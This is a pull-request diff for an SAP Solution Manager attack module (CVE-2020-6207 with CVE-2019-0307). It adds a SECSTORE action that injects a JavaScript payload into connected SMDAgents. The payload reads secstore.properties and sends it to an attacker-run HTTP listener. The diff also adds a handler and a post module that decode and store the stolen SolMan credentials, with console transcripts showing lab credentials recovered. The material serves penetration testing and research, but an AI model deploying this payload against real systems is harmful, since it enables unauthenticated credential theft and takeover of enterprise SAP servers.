### PR TITLE
Add post module for CVE-2019-0307 and add action SECTORE in auxiliary module cve_2020_6207_solman_rce.rb

### DIFF
--- a/documentation/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.md
+++ b/documentation/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.md
@@ -7,7 +7,12 @@ send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works s
 Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected
 to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
 
-Paper: [An Unauthenticated Journey to Root][1]
+If a connected SMDAgent has CVE-2019-0307 vulnerability, unauthenticated remote attackers can obtain its
+secstore.properties file, which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
+
+CVE-2019-0307 vulnerability paper: [The Agent Who Spoke Too Much][1]
+
+CVE-2020-6207 vulnerability paper: [An Unauthenticated Journey to Root][2]
 
 ### Application Background
 In SAP landscapes, SolMan could be compared to a domain controller system in the Microsoft world.
@@ -17,7 +22,7 @@ As an administration solution, SolMan is intended to centralize the management o
 performing actions such as implementing, supporting, monitoring and maintaining the enterprise solutions.
 
 ### Installation Steps
-Steps to install, configure and manage SolMan can be found online at [this page][2].
+Steps to install, configure and manage SolMan can be found online at [this page][3].
 
 Once set up and configured, the instances will be vulnerable on the default HTTP port 50000.
 
@@ -41,6 +46,11 @@ Once set up and configured, the instances will be vulnerable on the default HTTP
 1. Do: `set action EXEC`
 1. Do: `run`
 1. Verify that the OS command has been executed on the connected agent.
+1. Do: `set AGENT [Connected agent server name]`
+1. Do: `set SRVHOST [Local IP]`
+1. Do: `set action SECSTORE`
+1. Do: `run`
+1. Verify that the credentials for Solution Manager have been obtained.
 
 ## Options
 
@@ -72,13 +82,24 @@ Example: `http://1.1.1.1/test.html`
 OS command for executing in connected agent, the server name of which is specified in the `AGENT` option.
 Example: `ping -c 4 1.1.1.1`
 
+### SRVHOST
+
+The local IP address to listen HTTP requests from agent, the server name of which is specified in the `AGENT` option.
+Example: `192.168.1.1`
+
+### SRVPORT
+
+The local port to listen HTTP requests from agent, the server name of which is specified in the `AGENT` option.
+Example: `8000`
+
 ## Actions
 ```
-   Name  Description
-   ----  -----------
-   EXEC  Exec OS command on connected agent
-   LIST  List connected agents
-   SSRF  Send SSRF from connected agent
+   Name      Description
+   ----      -----------
+   EXEC      Exec OS command on connected agent
+   LIST      List connected agents
+   SECSTORE  Get file with SolMan credentials from connected agent
+   SSRF      Send SSRF from connected agent
 ```
 
 ## Scenarios
@@ -102,10 +123,10 @@ msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
 Connected Agents List
 =====================
 
- Server Name   Host Name                Instance Name  OS Name                 Java Version
- -----------   ---------                -------------  -------                 ------------
- test_windows  SAP731.corp.test.com     SMDA97         Windows Server 2008 R2  1.6.0_29
- test_linux    SAPERP7.corp.test.com    SMDA98         Linux                   1.8.0_25
+ Server Name   Host Name              Instance Name  OS Name                 Java Version
+ -----------   ---------              -------------  -------                 ------------
+ test_windows  sap731.corp.test.com   SMDA97         Windows Server 2008 R2  1.6.0_29
+ test_linux    saperp7.corp.test.com  SMDA98         Linux                   1.8.0_25
 
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SSRF
@@ -120,9 +141,9 @@ msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
 [*] Running module against 172.16.30.46
 
 [*] Enable EEM on agent: test_linux
-[*] Start script: 36al0keSSTeh with SSRF payload on agent: test_linux
-[*] Stop script: 36al0keSSTeh on agent: test_linux
-[*] Delete script: 36al0keSSTeh on agent: test_linux
+[*] Start script: IqsDdgpc5Iwu with SSRF payload on agent: test_linux
+[*] Stop script: IqsDdgpc5Iwu on agent: test_linux
+[*] Delete script: IqsDdgpc5Iwu on agent: test_linux
 [+] Send SSRF: 'PUT http://192.168.50.3:7777/ HTTP/1.1' from agent: test_linux
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION EXEC
@@ -135,11 +156,40 @@ msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
 [*] Running module against 172.16.30.46
 
 [*] Enable EEM on agent: test_linux
-[*] Start script: qAPSRKSCysFf with RCE payload on agent: test_linux
-[*] Stop script: qAPSRKSCysFf on agent: test_linux
-[*] Delete script: qAPSRKSCysFf on agent: test_linux
+[*] Start script: Lu5BnHgzVehn with RCE payload on agent: test_linux
+[*] Stop script: Lu5BnHgzVehn on agent: test_linux
+[*] Delete script: Lu5BnHgzVehn on agent: test_linux
 [+] Execution command: 'ping -c 4 192.168.50.3' on agent: test_linux
 [*] Auxiliary module execution completed
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set ACTION SECSTORE
+ACTION => SECSTORE
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set AGENT test_linux
+AGENT => test_linux
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > set SRVHOST 192.168.50.3
+SRVHOST => 192.168.50.3
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > run
+[*] Running module against 172.16.30.46
+
+[*] Enable EEM on agent: test_linux
+[*] Using URL: http://192.168.50.3:8000/ginMlA2izrNi
+[*] Start script: ginMlA2izrNi with payload for retrieving SolMan credentials file from agent: test_linux
+[*] Received HTTP request from agent test_linux - 172.16.30.14
+[+] Successfully retrieved file /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties from agent: test_linux saved in: /Users/vladimir/.msf4/loot/20210327204344_SAP_TEST_172.16.30.14_smdagent.secstor_025841.txt
+[+] Successfully encoded credentials for SolMan server: 172.16.30.46:50000 from agent: test_linux - 172.16.30.14
+[+] SMD Username: j2ee_admin
+[+] SMD Password: asdQWE123
+[*] Stop script: ginMlA2izrNi on agent: test_linux
+[*] Delete script: ginMlA2izrNi on agent: test_linux
+[*] Server stopped.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > creds
+Credentials
+===========
+
+host          origin        service           public      private    realm  private_type  JtR Format
+----          ------        -------           ------      -------    -----  ------------  ----------
+172.16.30.46  172.16.30.46  50000/tcp (soap)  j2ee_admin  asdQWE123         Password
+
 msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > services
 Services
 ========
@@ -153,14 +203,22 @@ msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > vulns
 Vulnerabilities
 ===============
 
-Timestamp                Host          Name                                                            References
----------                ----          ----                                                            ----------
-2021-03-25 14:01:33 UTC  172.16.30.46  SAP Solution Manager remote unauthorized OS commands execution  CVE-2020-6207,URL-https://i.blackhat.com/USA-20/Wednesday/us-20-
-                                                                                                       Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-E
-                                                                                                       nterprise-Software-Servers-wp.pdf,URL-https://github.com/chipik/
-                                                                                                       SAP_EEM_CVE-2020-6207
+Timestamp                Host          Name                                                                                               References
+---------                ----          ----                                                                                               ----------
+2021-03-27 17:49:37 UTC  172.16.30.46  SAP Solution Manager remote unauthorized OS commands execution                                     CVE-2020-6207,URL-https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf,URL-https://github.com/chipik/SAP_EEM_CVE-2020-6207
+2021-03-27 17:49:41 UTC  172.16.30.14  Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
+
+msf6 auxiliary(admin/sap/cve_2020_6207_solman_rce) > loot
+
+Loot
+====
+
+host          service  type                          name                                                            content     info                                path
+----          -------  ----                          ----                                                            -------     ----                                ----
+172.16.30.14           smdagent.secstore.properties  /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties  text/plain  SMD Agent secstore.properties file  /Users/vladimir/.msf4/loot/a228e5f820edc34bc767-20210327204941_SAP_TEST_172.16.30.14_smdagent.secstor_283920.txt
 
 ```
 
-[1]: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
-[2]: https://blogs.sap.com/2016/02/16/solution-manager-72-installation-and-configuration-i-installations/
+[1]: https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
+[2]: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
+[3]: https://blogs.sap.com/2016/02/16/solution-manager-72-installation-and-configuration-i-installations/

--- a/documentation/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.md
+++ b/documentation/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.md
@@ -7,7 +7,7 @@ send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works s
 Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected
 to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
 
-If a connected SMDAgent has CVE-2019-0307 vulnerability, unauthenticated remote attackers can obtain its
+If a connected SMDAgent is also vulnerable to CVE-2019-0307, unauthenticated remote attackers can obtain its
 secstore.properties file, which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
 
 CVE-2019-0307 vulnerability paper: [The Agent Who Spoke Too Much][1]

--- a/documentation/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.md
+++ b/documentation/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.md
@@ -4,8 +4,8 @@ SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due 
 checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,
 send HTTP request (SSRF), and execute OS commands on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.
 
-Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute OS commands from the agent connected
-to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
+Successful exploitation of the vulnerability enables unauthenticated remote attackers to achieve SSRF and execute
+OS commands from the agent connected to SolMan as a user from which the SMDAgent service starts, usually the daaadm.
 
 If a connected SMDAgent is also vulnerable to CVE-2019-0307, unauthenticated remote attackers can obtain its
 secstore.properties file, which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
@@ -81,16 +81,6 @@ Example: `http://1.1.1.1/test.html`
 
 OS command for executing in connected agent, the server name of which is specified in the `AGENT` option.
 Example: `ping -c 4 1.1.1.1`
-
-### SRVHOST
-
-The local IP address to listen HTTP requests from agent, the server name of which is specified in the `AGENT` option.
-Example: `192.168.1.1`
-
-### SRVPORT
-
-The local port to listen HTTP requests from agent, the server name of which is specified in the `AGENT` option.
-Example: `8000`
 
 ## Actions
 ```

--- a/documentation/modules/post/multi/sap/smdagent_get_properties.md
+++ b/documentation/modules/post/multi/sap/smdagent_get_properties.md
@@ -1,0 +1,112 @@
+## Vulnerable Application
+
+Any SMDAgent system with a `shell` or `meterpreter` session. Attackers can obtain secstore.properties file, 
+which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
+
+## Verification Steps
+
+1. Get a `shell` or `meterpreter` session on some host.
+2. Do: ```use post/multi/sap/smdagent_get_properties```
+3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
+4. Do: ```run```
+5. If the system has configuration files containing unencrypted credentials for the SAP Solution Manager server, they will be printed out.
+
+## Options
+
+None.
+
+## Scenarios
+
+```
+msf6 post(multi/sap/smdagent_get_properties) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                             Connection
+  --  ----  ----                     -----------                             ----------
+  1         shell linux              SSH daaadm:TestPass1 (172.16.30.14:22)  192.168.50.2:58316 -> 172.16.30.14:22 (172.16.30.14)
+  2         meterpreter x64/windows  SAP731\Administrator @ SAP731           0.0.0.0:0 -> 172.16.30.80:4444 (172.16.30.80)
+
+msf6 post(multi/sap/smdagent_get_properties) > set SESSION 1
+SESSION => 1
+msf6 post(multi/sap/smdagent_get_properties) > run
+
+[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205801_SAP_TEST_172.16.30.14_smdagent.propert_457968.txt
+[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205811_SAP_TEST_172.16.30.14_smdagent.propert_587689.txt
+
+[*] Instance: SMDA98
+[*] Runtime properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties
+[*] Secstore properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties
+
+[*] SLD properties:
+[*] SLD protocol: http
+[*] SLD hostname: solman.corp.test.com
+[*] SLD port: 50000
+[+] SLD username: j2ee_admin
+[+] SLD password: asdQWE123
+
+[*] SMD properties:
+[*] SMD url: p4://172.16.30.46:50004
+[+] SMD username: j2ee_admin
+[+] SMD password: asdQWE123
+
+[+] Store decoded credentials for SolMan server
+[*] Post module execution completed
+msf6 post(multi/sap/smdagent_get_properties) > set SESSION 2
+SESSION => 2
+msf6 post(multi/sap/smdagent_get_properties) > run
+
+[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_357417.txt
+[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_604626.txt
+
+[*] Instance: SMDA97
+[*] Runtime properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties
+[*] Secstore properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties
+
+[*] SLD properties:
+[*] SLD protocol: http
+[*] SLD hostname: 172.16.30.46
+[*] SLD port: 50000
+[+] SLD username: SLDDSUSER
+[+] SLD password: asdQWE123
+
+[*] SMD properties:
+[*] SMD url: p4://172.16.30.46:50004
+[+] SMD username: j2ee_admin
+[+] SMD password: asdQWE123
+
+[+] Store decoded credentials for SolMan server
+[*] Post module execution completed
+msf6 post(multi/sap/smdagent_get_properties) > creds
+Credentials
+===========
+
+host           origin         service           public      private    realm  private_type  JtR Format
+----           ------         -------           ------      -------    -----  ------------  ----------
+172.16.30.100  172.16.30.100  50000/tcp (http)  j2ee_admin  asdQWE123         Password
+172.16.30.100  172.16.30.100  50000/tcp (http)  SLDDSUSER   asdQWE123         Password
+
+msf6 post(multi/sap/smdagent_get_properties) > services
+Services
+========
+
+host           port   proto  name  state  info
+----           ----   -----  ----  -----  ----
+172.16.30.46   50000  tcp    soap  open   SAP Solution Manager
+
+msf6 post(multi/sap/smdagent_get_properties) > vulns
+
+Vulnerabilities
+===============
+
+Timestamp                Host          Name                                                       References
+---------                ----          ----                                                       ----------
+2021-03-29 17:58:11 UTC  172.16.30.14  Diagnostics Agent in Solution Manager, stores unencrypted  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
+                                        credentials for Solution Manager server                   002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
+                                                                                                  %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
+2021-03-29 17:58:23 UTC  172.16.30.80  Diagnostics Agent in Solution Manager, stores unencrypted  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
+                                        credentials for Solution Manager server                   002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
+                                                                                                  %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
+
+```

--- a/documentation/modules/post/multi/sap/smdagent_get_properties.md
+++ b/documentation/modules/post/multi/sap/smdagent_get_properties.md
@@ -1,13 +1,14 @@
 ## Vulnerable Application
 
-This module retrieves the `secstore.properties` file on a SMDAgent. This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.
+This module retrieves the `secstore.properties` file on a SMDAgent.
+This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.
 
 ## Verification Steps
 
 1. Get a `shell` or `meterpreter` session on some host.
-2. Do: ```use post/multi/sap/smdagent_get_properties```
-3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
-4. Do: ```run```
+2. Do: `use post/multi/sap/smdagent_get_properties`
+3. Do: `set SESSION [SESSION_ID]`, replacing `[SESSION_ID]` with the session number you wish to run this one.
+4. Do: `run`
 5. If the system has configuration files containing unencrypted credentials for the SAP Solution Manager server, they will be printed out.
 
 ## Options

--- a/documentation/modules/post/multi/sap/smdagent_get_properties.md
+++ b/documentation/modules/post/multi/sap/smdagent_get_properties.md
@@ -1,7 +1,6 @@
 ## Vulnerable Application
 
-Any SMDAgent system with a `shell` or `meterpreter` session. Attackers can obtain secstore.properties file, 
-which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
+This module retrieves the `secstore.properties` file on a SMDAgent. This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.
 
 ## Verification Steps
 

--- a/lib/msf/core/exploit/local/sap_smd_agent_unencrypted_property.rb
+++ b/lib/msf/core/exploit/local/sap_smd_agent_unencrypted_property.rb
@@ -29,4 +29,3 @@ module Msf
     end
   end
 end
-

--- a/lib/msf/core/exploit/local/sap_smd_agent_unencrypted_property.rb
+++ b/lib/msf/core/exploit/local/sap_smd_agent_unencrypted_property.rb
@@ -1,0 +1,32 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Local::SapSmdAgentUnencryptedProperty
+    def parse_properties(file_content)
+      results = []
+      rows = file_content.split(/\n+/)
+      rows.each do |row|
+        property = row.match(/(?<name>.*[^\\])=(?<value>.*)/)
+        next if property.nil?
+
+        property_name = property[:name]
+        property_value = property[:value].strip
+        if property_name =~ %r{(smd/agent/|sld/usr|sld/pwd)}i
+          # BASE64 decode and parse property value
+          string_type, string_len, string_val = Rex::Text.decode_base64(property[:value].sub('\\=', '=')).split(/\|/)
+          if string_len.to_i > 0 && string_type == 'java.lang.String'
+            property_value = string_val.first(string_len.to_i)
+          else
+            property_value = nil
+          end
+        end
+        results.push({
+          name: property_name,
+          value: property_value
+        })
+      end
+      results
+    end
+  end
+end
+

--- a/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
+++ b/lib/msf/core/exploit/remote/http/sap_sol_man_eem_miss_auth.rb
@@ -48,6 +48,29 @@ module Msf
       rce_payload.to_s
     end
 
+    # Make payload for steal credentials for SolMan server from agent
+    def make_steal_credentials_payload(instance, host, port, url)
+      command = "var u = new Packages.java.net.URL(\"http://#{host}:#{port}#{url}\");"
+      command << 'var o = Packages.java.lang.System.getProperty("os.name").toLowerCase();'
+      command << 'if (o.indexOf("win") >= 0) '
+      command << "{var p = Packages.java.nio.file.Paths.get(\"C:\\\\usr\\\\sap\\\\DAA\\\\#{instance}\\\\SMDAgent\\\\configuration\\\\secstore.properties\");} "
+      command << "else {var p = Packages.java.nio.file.Paths.get(\"/usr/sap/DAA/#{instance}/SMDAgent/configuration/secstore.properties\");} "
+      command << 'var f = Packages.java.nio.file.Files.readAllBytes(p);var c = u.openConnection();c.setDoOutput(true);'
+      command << 'c.setRequestProperty("Content-Type","application/octet-stream");'
+      command << 'c.setRequestProperty("X-File-Name",p.toAbsolutePath().toString());'
+      command << 'var w = new Packages.java.io.DataOutputStream(c.getOutputStream());w.write(f);'
+      command << 'try {c.getInputStream();} finally {c.disconnect();}'
+      creds_payload = Nokogiri::XML(<<-CREDS_PAYLOAD, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS)
+      #{PAYLOAD_XML[:prefix]}
+      <Message activated="true" id="2" method="AssignJS" name="AssignJS" type="Command" url="">
+        <Param name="expression" value=#{command.encode(xml: :attr)} />
+        <Param name="variable" value="test" />
+      </Message>
+      #{PAYLOAD_XML[:suffix]}
+      CREDS_PAYLOAD
+      creds_payload.to_s
+    end
+
     # Make SOAP body for SSRF or RCE payload xml string
     def make_soap_body(agent_name, script_name, payload)
       soap_body = Nokogiri::XML(<<-SOAP_BODY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
@@ -180,7 +203,7 @@ module Msf
       end
       agents.each do |agent|
         if agent_name == agent[:serverName]
-          return true
+          return agent
         end
       end
       fail_with(Msf::Module::Failure::NotFound, "Not found agent: #{agent_name} in connected agents:\n#{pretty_agents_table(agents)}")

--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
@@ -127,8 +127,8 @@ class MetasploitModule < Msf::Auxiliary
 
     # Loot secstore.properties file
     loot = store_loot('smdagent.secstore.properties', 'text/plain', agent_host, secstore_content, secstore_filename, 'SMD Agent secstore.properties file')
-    vprint_good("Successfully retrieved file #{secstore_filename} from agent: #{@agent_name} file content:\n#{secstore_content}")
     print_good("Successfully retrieved file #{secstore_filename} from agent: #{@agent_name} saved in: #{loot}")
+    vprint_good("File content:\n#{secstore_content}")
 
     # Analyze secstore.properties file
     properties = parse_properties(secstore_content)

--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
@@ -5,8 +5,10 @@
 
 class MetasploitModule < Msf::Auxiliary
 
+  include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HTTP::SapSolManEemMissAuth
+  include Msf::Exploit::Local::SapSmdAgentUnencryptedProperty
 
   def initialize(info = {})
     super(
@@ -39,7 +41,8 @@ class MetasploitModule < Msf::Auxiliary
         'Actions' => [
           ['LIST', { 'Description' => 'List connected agents' }],
           ['SSRF', { 'Description' => 'Send SSRF from connected agent' }],
-          ['EXEC', { 'Description' => 'Exec OS command on connected agent' }]
+          ['EXEC', { 'Description' => 'Exec OS command on connected agent' }],
+          ['SECSTORE', { 'Description' => 'Get file with SolMan credentials from connected agent' }]
         ],
         'DefaultAction' => 'LIST',
         'DisclosureDate' => '2020-10-03'
@@ -49,10 +52,12 @@ class MetasploitModule < Msf::Auxiliary
       [
         Opt::RPORT(50000),
         OptString.new('TARGETURI', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),
-        OptString.new('SSRF_METHOD', [false, 'HTTP method for SSRF', 'GET'], conditions: %w[ACTION == SSRF]),
-        OptString.new('SSRF_URI', [false, 'URI for SSRF', 'http://127.0.0.1:80/'], conditions: %w[ACTION == SSRF]),
-        OptString.new('COMMAND', [false, 'Command for execute in agent', 'id'], conditions: %w[ACTION == EXEC]),
-        OptString.new('AGENT', [false, 'Agent server name for exec command or SSRF', 'agent_server_name'], conditions: ['ACTION', 'in', %w[SSRF EXEC]]),
+        OptString.new('SSRF_METHOD', [true, 'HTTP method for SSRF', 'GET'], conditions: %w[ACTION == SSRF]),
+        OptString.new('SSRF_URI', [true, 'URI for SSRF', 'http://127.0.0.1:80/'], conditions: %w[ACTION == SSRF]),
+        OptString.new('COMMAND', [true, 'Command for execute in agent', 'id'], conditions: %w[ACTION == EXEC]),
+        OptAddress.new('SRVHOST', [ true, 'The local IP address to listen HTTP requests from agents', '192.168.1.1' ], conditions: %w[ACTION == SECSTORE]),
+        OptPort.new('SRVPORT', [ true, 'The local port to listen HTTP requests from agents', 8000 ], conditions: %w[ACTION == SECSTORE]),
+        OptString.new('AGENT', [true, 'Agent server name for exec command or SSRF', 'agent_server_name'], conditions: ['ACTION', 'in', %w[SSRF EXEC SECSTORE]]),
       ]
     )
   end
@@ -60,6 +65,8 @@ class MetasploitModule < Msf::Auxiliary
   def setup_xml_and_variables
     @host = datastore['RHOSTS']
     @port = datastore['RPORT']
+    @srv_host = datastore['SRVHOST']
+    @srv_port = datastore['SRVPORT']
     @path = datastore['TARGETURI']
 
     @agent_name = datastore['AGENT']
@@ -77,6 +84,9 @@ class MetasploitModule < Msf::Auxiliary
     @ssrf_uri = datastore['SSRF_URI']
     @ssrf_payload = make_ssrf_payload(@ssrf_method, @ssrf_uri)
     @rce_command = datastore['COMMAND']
+
+    @username = nil
+    @password = nil
   end
 
   # Report Service and Vulnerability
@@ -96,6 +106,75 @@ class MetasploitModule < Msf::Auxiliary
     )
   end
 
+  # Handle incoming HTTP requests from connected agents
+  def on_request_uri(cli, request, script_name)
+    setup_xml_and_variables
+    @script_name = script_name
+
+    response = create_response(200, 'OK')
+    response.body = 'Received'
+    cli.send_response(response)
+
+    agent_host = cli.peerhost
+    request_uri = request.raw_uri
+    secstore_content = request.body
+    secstore_filename = request.headers['X-File-Name']
+
+    if secstore_content.nil? || secstore_filename.nil? || agent_host.nil? || request_uri.nil? || request_uri != "/#{@script_name}"
+      fail_with(Failure::PayloadFailed, "Failed to retrieve secstore.properties file from agent #{@agent_name}.")
+    end
+    print_status("Received HTTP request from agent #{@agent_name} - #{agent_host}")
+
+    # Loot secstore.properties file
+    loot = store_loot('smdagent.secstore.properties', 'text/plain', agent_host, secstore_content, secstore_filename, 'SMD Agent secstore.properties file')
+    vprint_good("Successfully retrieved file #{secstore_filename} from agent: #{@agent_name} file content:\n#{secstore_content}")
+    print_good("Successfully retrieved file #{secstore_filename} from agent: #{@agent_name} saved in: #{loot}")
+
+    # Analyze secstore.properties file
+    properties = parse_properties(secstore_content)
+    properties.each do |property|
+      case property[:name]
+      when 'smd/agent/User'
+        @username = property[:value]
+      when 'smd/agent/Password'
+        @password = property[:value]
+      end
+    end
+
+    # Store decoded credentials and report vulnerability
+    if @username.nil? || @password.nil?
+      fail_with(Failure::NotVulnerable, "The agent: #{@agent_name} sent a secstore.properties file, but this file is likely encrypted or does not contain credentials. The agent: #{@agent_name} is likely patched.")
+    else
+      # Store decoded credentials
+      print_good("Successfully encoded credentials for SolMan server: #{@host}:#{@port} from agent: #{@agent_name} - #{agent_host}")
+      print_good("SMD username: #{@username}")
+      print_good("SMD password: #{@password}")
+      store_valid_credential(
+        user: @username,
+        private: @password,
+        private_type: :password,
+        service_data: {
+          origin_type: :service,
+          address: @host,
+          port: @port,
+          service_name: 'http',
+          protocol: 'tcp'
+        }
+      )
+      # Report vulnerability
+      new_references_array = [
+        %w[CVE 2019-0307],
+        %w[URL https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf]
+      ]
+      new_references = Rex::Transformer.transform(new_references_array, Array, [SiteReference, Reference], 'Ref')
+      report_vuln(
+        host: agent_host,
+        name: 'Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server',
+        refs: new_references
+      )
+    end
+  end
+
   def run
     case action.name
     when 'LIST'
@@ -104,6 +183,8 @@ class MetasploitModule < Msf::Auxiliary
       action_ssrf
     when 'EXEC'
       action_exec
+    when 'SECSTORE'
+      action_secstore
     else
       print_error("The action #{action.name} is not a supported action.")
     end
@@ -161,6 +242,38 @@ class MetasploitModule < Msf::Auxiliary
 
     report_service_and_vuln
     print_good("Execution command: '#{@rce_command}' on agent: #{@agent_name}")
+  end
+
+  def action_secstore
+    setup_xml_and_variables
+    agent = check_agent(@agent_name)
+
+    print_status("Enable EEM on agent: #{@agent_name}")
+    enable_eem(@agent_name)
+
+    start_service(
+      {
+        'Uri' => {
+          'Proc' => proc { |cli, req| on_request_uri(cli, req, @script_name) },
+          'Path' => "/#{@script_name}"
+        }
+      }
+    )
+    @creds_payload = make_steal_credentials_payload(agent[:instanceName], @srv_host, @srv_port, "/#{@script_name}")
+    print_status("Start script: #{@script_name} with payload for retrieving SolMan credentials file from agent: #{@agent_name}")
+    send_soap_request(make_soap_body(@agent_name, @script_name, @creds_payload))
+
+    sleep(5)
+    print_status("Stop script: #{@script_name} on agent: #{@agent_name}")
+    stop_script_in_agent(@agent_name, @script_name)
+
+    print_status("Delete script: #{@script_name} on agent: #{@agent_name}")
+    delete_script_in_agent(@agent_name, @script_name)
+
+    report_service_and_vuln
+    if @username.nil? && @password.nil?
+      print_error("Failed to retrieve or decode SolMan credentials file from agent: #{@agent_name}")
+    end
   end
 
 end

--- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
+++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb
@@ -107,10 +107,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   # Handle incoming HTTP requests from connected agents
-  def on_request_uri(cli, request, script_name)
-    setup_xml_and_variables
-    @script_name = script_name
-
+  def on_request_uri(cli, request)
     response = create_response(200, 'OK')
     response.body = 'Received'
     cli.send_response(response)
@@ -176,6 +173,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
+    setup_xml_and_variables
     case action.name
     when 'LIST'
       action_list
@@ -191,8 +189,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def action_list
-    setup_xml_and_variables
-
     print_status("Getting a list of agents connected to the Solution Manager: #{@host}")
     agents = make_agents_array
 
@@ -205,7 +201,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def action_ssrf
-    setup_xml_and_variables
     check_agent(@agent_name)
 
     print_status("Enable EEM on agent: #{@agent_name}")
@@ -225,7 +220,6 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def action_exec
-    setup_xml_and_variables
     check_agent(@agent_name)
 
